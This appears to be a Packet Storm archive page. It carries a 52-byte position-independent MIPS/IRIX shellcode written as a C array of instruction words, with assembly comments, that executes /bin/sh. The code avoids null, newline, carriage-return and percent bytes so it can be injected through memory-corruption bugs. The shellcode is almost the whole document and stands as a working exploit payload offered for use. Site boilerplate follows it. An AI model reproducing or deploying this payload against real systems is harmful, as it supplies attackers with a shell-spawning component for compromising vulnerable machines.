52 byte MIPS/IRIX PIC shellcode that does an execve of /bin/sh.
16f8054992c0d396b5836585aca7a5de8f0a5d1d01fb58a831de763055ada649/** 52 byte execve PIC MIPS/IRIX shellcode **/
/** **/
/** ntronic at netric dot org 01/09/02 **/
/** 0x00/0x0a/0x0d/0x25 avoided! **/
unsigned int execshell[] = {
0xafa0fffc, // sw zero, -4($sp)
0x0410ffff, // foo: bltzal $zero, $foo
0x8fa6fffc, // lw $a2, -4($sp)
0x241fffdb, // li $ra,-41
0x03e0f827, // nor $ra,$ra,$zero
0x33e4ffff, // andi $a0,$ra,0xffff
0x701ffffe, // sb $zero, -(1)($ra)
0xafa4fff8, // sw $a0, -8($sp)
0x20bffff8, // addi $a1, $sp, -8
0x24020423, // li v0, SYS_execve
0x0101010c, // syscall
0x2f62696e, // .ascii "/bin"
0x2f736841 // .ascii "/sh", .byte 0x41 (dummy)
};
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed